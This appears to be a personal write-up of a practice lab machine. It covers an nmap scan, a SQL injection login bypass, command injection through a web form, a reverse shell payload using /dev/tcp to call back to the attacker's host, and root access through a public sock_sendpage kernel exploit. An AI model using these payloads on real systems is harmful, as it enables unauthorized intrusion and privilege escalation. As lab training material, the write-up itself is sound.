Enumeration
NMAP
First, I went ahead and launched a port scan against the target machine.
nmap -Pn -A -sV -p- $target
PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 3.9p1 (protocol 1.99) |sshv1: Server supports SSHv1 80/tcp open http syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS)) | http-methods: | Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.0.52 (CentOS) |http-title: Site doesn't have a title (text/html; charset=UTF-8). 111/tcp open rpcbind syn-ack ttl 64 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 615/udp status | 100024 1 618/tcp status 443/tcp open ssl/https? syn-ack ttl 64 | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/organizationalUnitName=SomeOrganizationalUnit/emailAddress=root@localhost.localdomain/localityName=SomeCity | Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/organizationalUnitName=SomeOrganizationalUnit/emailAddress=root@localhost.localdomain/localityName=SomeCity 618/tcp open status syn-ack ttl 64 1 (RPC #100024) 631/tcp open ipp syn-ack ttl 64 CUPS 1.1 | http-methods: | Supported Methods: GET HEAD OPTIONS POST PUT |_ Potentially risky methods: PUT |_http-server-header: CUPS/1.1 |_http-title: 403 Forbidden 3306/tcp open mysql syn-ack ttl 64 MySQL (unauthorized) MAC Address: 00:0C:29:A3:ED:9F (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.30
Fine tuned scan results
WEB - 80
/cgi-bin/ (Status: 403) [Size: 289] /cgi-bin/.html (Status: 403) [Size: 294] /index.php (Status: 200) [Size: 667] /index.php (Status: 200) [Size: 667] /manual (Status: 301) [Size: 315] /usage (Status: 403) [Size: 286]
/
/manual
Exploitation
Authentication Bypass
The web app was vulnerable to SQL Injection Authentication Bypass as shown below.
admin' or '1'='1'#
http://192.168.0.132/index.php
Command Injection
I noticed that the web app executed commands on the base system based on user input.
Thus, I decided to try and inject custom commands into this field to trigger the system to run it.
127.0.0.1 && whoami
As seen above, I was able to get command execution on the machine via the web portal. I then used this vulnerability to get a reverse shell back to my attack box as follows.
127.0.0.1 && bash -i >& /dev/tcp/192.168.0.108/443 0>&1
And it worked!
Privilege Escalation
Linpeas
While running linpeas, I noticed that the box was running a pretty old linux kernel version (2.6.9-55.EL).
Searchsploit
I then made my way to searchsploit to look for a kernel exploit that would fit this particular target.
searchsploit linux 2.6 centos
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' | linux/local/9545.c
This was the exploit I ended up going with this!
GCC
I then transferred the file over to the remote machine before compiling it with GCC. This was to ensure that the architecture matched the executable in the end.
gcc -o exploit 9545.c
However, I ran into the shown error. All C source files need a newline at the end of the file for compilation. I just had to add that before compiling again.
After fixing that, the exploit compiled with no issues.
Rooty
And I was the root user! ๐
-Nee